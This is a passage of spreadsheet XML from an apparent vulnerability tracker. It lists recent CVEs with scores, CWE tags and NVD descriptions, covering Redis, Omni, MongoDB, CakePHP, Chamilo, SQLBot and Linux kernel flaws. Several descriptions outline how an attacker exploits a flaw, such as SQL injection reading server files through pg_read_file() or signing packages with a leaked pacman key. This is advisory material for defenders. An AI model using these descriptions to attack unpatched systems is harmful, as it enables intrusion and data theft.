        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>lxc-ci contains continuous integration and image-build scripts for LXC. Prior to the 2026-05-28 Arch Linux image publication, images built from images/archlinux.yaml retain the same pacman local-signing private key in /etc/pacman.d/gnupg and redistribute it to every container or virtual machine created from that image. An attacker who controls an HTTP package mirror or can intercept mirror traffic can use the shared pacman signing private key to sign modified packages that affected clients accept as trusted. Installing those packages permits arbitrary code execution as root on the client system. This issue is fixed in Arch Linux images published on or after 2026-05-28.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52727</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92925</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Redis community. The cluster bus packet parser, responsible for handling PING, PONG, and MEET packets, fails to properly validate string-carrying extensions for null-termination. This oversight allows a remote attacker to craft a malicious packet, leading to an out-of-bounds read when the packet's payload is processed. Successful exploitation of this vulnerability could result in the disclosure of sensitive information or a remote denial of service (DoS).</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92925</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45720</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-367</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and from 1.7.0 until 1.7.3, SAML.getSession in internal/pkg/auth/interceptor/saml.go checks SAMLAssertion.Used and marks it used in separate state operations. Concurrent requests carrying the same captured saml-session token can each observe the assertion as unused and obtain authentication as the victim before either update is visible. The attacker can invoke SAML-protected gRPC endpoints, use ConfirmPublicKey to create multiple persistent credentials tied to the victim, and generate audit entries attributed to the victim, with the resulting access potentially affecting confidentiality, integrity, and availability according to the victim's privileges. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45720</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92756</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which combine independent encryption settings and this provider's encryption settings may silently lose TLS and schema-map settings leading to protected fields being stored unencrypted in the database.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92756</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92757</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-311</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Applications built on MongoDB Entity Framework Core Provider which place a database name in the connection string may inadvertently disable field level encryption.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92757</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53556</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/previewData endpoint in backend/apps/datasource/crud/datasource.py incorporates the client-controlled table_name value into generated SQL without safe identifier handling. An authenticated user can configure a datasource for SQLBot's internal PostgreSQL service and submit a crafted table_name that remains a SELECT operation under the read-only policy while invoking pg_read_file(), pg_read_binary_file(), or pg_ls_dir(). In the default tested trusted loopback authentication configuration, the internal connection accepts invalid credentials and executes with PostgreSQL superuser privileges, allowing filesystem content such as /etc/hosts and /etc/passwd to be returned in the previewData API response and potentially exposing configuration, credentials, authentication secrets, and source code. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53556</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92758</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>If logging mode is set to DEBUG or a malformed MongoDB connection string is used, application logs may collect sensitive information (if in use) such as passwords and AWS secure access keys.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92758</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45723</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-209, CWE-22, CWE-441, CWE-918</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.6.6 and 1.7.3, managementServer.CreateSchematic in internal/backend/grpc/schematics.go passes the caller-controlled TalosVersion field to imageFactoryClient.OverlaysVersions without validating it as a version. An authenticated Operator can submit traversal segments in TalosVersion, and url.URL.JoinPath normalizes them into unintended paths on the configured image-factory host. Omni then issues HTTP GET requests to those paths and reflects error-body content, enabling same-host endpoint probing and possible disclosure of internal diagnostics while preventing redirection to another host or write requests. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45723</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90332</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr"/>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: dwc: ep: Flush cached MSI write before unmapping the iATU
The MSI-X path already flushes any posted MSI-X write before tearing down
its iATU mapping. That was added by commit c22533c66cca ("PCI: dwc: ep:
Flush MSI-X write before unmapping its ATU entry") to make sure the write
reaches the Root Complex before the outbound window that translates it
disappears.
The MSI path has the same problem but no equivalent flush. When the
Endpoint driver caches an MSI target address and later observes that the
Root Complex has changed it, dw_pcie_ep_raise_msi_irq() unmaps the existing
iATU entry and reprograms it for the new address. Between the last MSI
writel() and the unmap there may still be a posted write sitting in the
fabric, and unmapping the iATU entry can drop or misroute that write.
Fix this by reading back from the mapped MSI window before the unmap. The
readback drains any posted MSI writes through the same iATU entry that
mapped them, which is the same logic the MSI-X path uses.
[mani: commit log]</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90332</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93063</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr"/>
      <c r="F21" s="5" t="inlineStr"/>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr"/>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mei: check SAP message length before reading it
Verify the SAP message size is not larger than the local buffer before
reading the message to avoid buffer overflow.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93063</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93068</t>
        </is>
      </c>
      <c r="D22" s="5" t="inlineStr"/>
      <c r="E22" s="5" t="inlineStr"/>
      <c r="F22" s="5" t="inlineStr"/>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr"/>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix DM I2C teardown race
DM I2C adapters can remain visible to userspace while DM teardown is
already in progress. A concurrent i2c-dev transfer may then enter
amdgpu_dm_i2c_xfer() after the backing DM state has been torn down,
leading to a NULL pointer dereference.
Create a devres group around the DM I2C adapter lifetime and release it
at the start of dm_hw_fini(), before HPD, IRQ, and DM state are torn
down. This removes the I2C adapters first and waits for in-flight users
to drain before the structures used by amdgpu_dm_i2c_xfer() disappear.
This fixes a teardown ordering race seen during device removal:
BUG: kernel NULL pointer dereference
RIP: amdgpu_dm_i2c_xfer+0x122/0x1c0 [amdgpu]
Call Trace:
__i2c_transfer
i2c_transfer
i2cdev_ioctl_rdwr</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93068</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93202</t>
        </is>
      </c>
      <c r="D23" s="5" t="inlineStr"/>
      <c r="E23" s="5" t="inlineStr"/>
      <c r="F23" s="5" t="inlineStr"/>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr"/>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: master: Fix recursive locking during device registration
i3c_master_register_new_i3c_devs() registers newly discovered devices
while holding i3c_bus_normaluse_lock(), a down_read().  device_register()
can immediately probe the device, and probe callbacks typically invoke
I3C helpers that take i3c_bus_normaluse_lock() again, leading to a
recursive acquisition of the same rwsem.  rwsems do not support recursive
read locking and can deadlock when a writer is waiting.  See the
"Recursive read locks" section of Documentation/locking/lockdep-design.rst.
For example, with Intel LPSS I3C, LOCKDEP generates a WARNING like:
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/unbind
  # echo intel-lpss-i3c.0 &gt; /sys/bus/platform/drivers/mipi-i3c-hci/bind
  WARNING: possible recursive locking detected
  kworker/5:1/94 is trying to acquire lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_device_match_id+0x45/0x370
  but task is already holding lock:
  ffff88811c810d78 (&amp;i3cbus-&gt;lock){++++}-{4:4}, at: i3c_master_reg_work_fn+0x21/0x5f0
Fix this by separating device creation from device registration.
Populate desc-&gt;dev under the maintenance lock, collect the devices that
still need registration into a local list, then release the lock before
calling device_register().  Finally retake the lock and clean up any
devices that failed to register.
Use the maintenance lock rather than the normal-use lock while adding
device objects.  A write-side maintenance lock prevents readers from
observing a partially initialized desc-&gt;dev during initial device
population, or desc-&gt;dev disappearing if registration fails.
The local list requires a list node, so add a list node member to struct
i3c_device.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93202</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T23"/>
  <conditionalFormatting sqref="E2:E2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CVE-2026-45140</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr">
        <is>
          <t>composer:chamilo/chamilo-lms</t>
        </is>
      </c>
      <c r="M2" s="5" t="inlineStr">
        <is>
          <t>2.0.1</t>
        </is>
      </c>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-219, CWE-22, CWE-434, CWE-94</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>Chamilo LMS is an open-source learning management system. Prior to 2.0.1, Chamilo LMS allows an unauthenticated remote attacker to execute arbitrary code on the server. The authoritative advisory does not identify the affected endpoint, component, input, or exploitation mechanism. This issue is fixed in version 2.0.1.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45140</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79752</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr">
        <is>
          <t>composer:cakephp/cakephp, composer:cakephp/database</t>
        </is>
      </c>
      <c r="M3" s="5" t="inlineStr">
        <is>
          <t>4.5.12, 4.6.5, 5.1.9, 5.2.14, 5.3.7</t>
        </is>
      </c>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7, FunctionsBuilder::cast, FunctionsBuilder::extract, FunctionsBuilder::datePart, and FunctionsBuilder::dateAdd in src/Database/FunctionsBuilder.php accept user-controlled dataType, part, or unit values and incorporate them into generated SQL as unescaped structural fragments. An application that passes untrusted input to these parameters can permit SQL injection with confidentiality, integrity, and availability impact according to the database connection's privileges. This issue is fixed in versions 4.5.12, 4.6.5, 5.1.9, 5.2.14, and 5.3.7.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79752</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63472</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>3.7.0</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
